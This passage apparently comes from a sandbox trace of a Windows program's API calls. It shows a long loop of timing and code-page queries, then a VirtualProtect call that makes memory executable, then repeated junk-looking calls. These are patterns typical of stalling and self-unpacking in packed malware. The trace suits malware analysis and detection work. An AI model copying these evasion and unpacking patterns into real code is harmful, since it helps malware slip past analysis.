GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.456] GetACP () returned 0x4e4 [0077.456] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.456] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.457] GetACP () returned 0x4e4 [0077.457] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.463] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.463] GetACP () returned 0x4e4 [0077.463] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.463] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.464] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.464] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.464] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.464] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.464] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.464] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.464] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.464] GetACP () returned 0x4e4 [0077.464] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.465] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.465] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.465] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.465] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.465] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.465] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.465] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.465] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.465] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.466] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.466] GetACP () returned 0x4e4 [0077.466] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.467] GetACP () returned 0x4e4 [0077.467] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.467] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.468] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.468] GetACP () returned 0x4e4 [0077.468] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.469] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.469] GetACP () returned 0x4e4 [0077.469] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.469] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.469] GetACP () returned 0x4e4 [0077.469] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.469] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.469] GetACP () returned 0x4e4 [0077.469] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.469] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.469] GetACP () returned 0x4e4 [0077.469] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.469] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.469] GetACP () returned 0x4e4 [0077.469] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.469] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.469] GetACP () returned 0x4e4 [0077.469] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.469] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.469] GetACP () returned 0x4e4 [0077.469] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.470] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.470] GetACP () returned 0x4e4 [0077.470] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.471] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.471] GetACP () returned 0x4e4 [0077.471] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.471] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.471] GetACP () returned 0x4e4 [0077.471] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.471] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.471] GetACP () returned 0x4e4 [0077.471] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.471] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.471] GetACP () returned 0x4e4 [0077.471] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.471] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.471] GetACP () returned 0x4e4 [0077.471] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.471] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.471] GetACP () returned 0x4e4 [0077.471] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.471] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.471] GetACP () returned 0x4e4 [0078.392] VirtualProtect (in: lpAddress=0x5b5ab8, dwSize=0xf540, flNewProtect=0x40, lpflOldProtect=0x43b444 | out: lpflOldProtect=0x43b444*=0x4) returned 1 [0078.392] AddAtomA (lpString=0x0) returned 0x0 [0078.392] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.393] AddAtomA (lpString=0x0) returned 0x0 [0078.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.393] AddAtomA (lpString=0x0) returned 0x0 [0078.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.393] AddAtomA (lpString=0x0) returned 0x0 [0078.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.393] AddAtomA (lpString=0x0) returned 0x0 [0078.393] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.393] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.393] AddAtomA (lpString=0x0) returned 0x0 [0078.394] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.394] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.394] AddAtomA (lpString=0x0) returned 0x0 [0078.394] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.394] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.394] AddAtomA (lpString=0x0) returned 0x0 [0078.394] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.395] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.395] AddAtomA (lpString=0x0) returned 0x0 [0078.395] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.395] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.395] AddAtomA (lpString=0x0) returned 0x0 [0078.395] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.395] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.395] AddAtomA (lpString=0x0) returned 0x0 [0078.395] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.395] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.395] AddAtomA (lpString=0x0) returned 0x0 [0078.395] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.395] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.396] AddAtomA (lpString=0x0) returned 0x0 [0078.396] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0078.396] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0078.396] AddAtomA (lpString=0x0) returned 0x0 [0078.396] 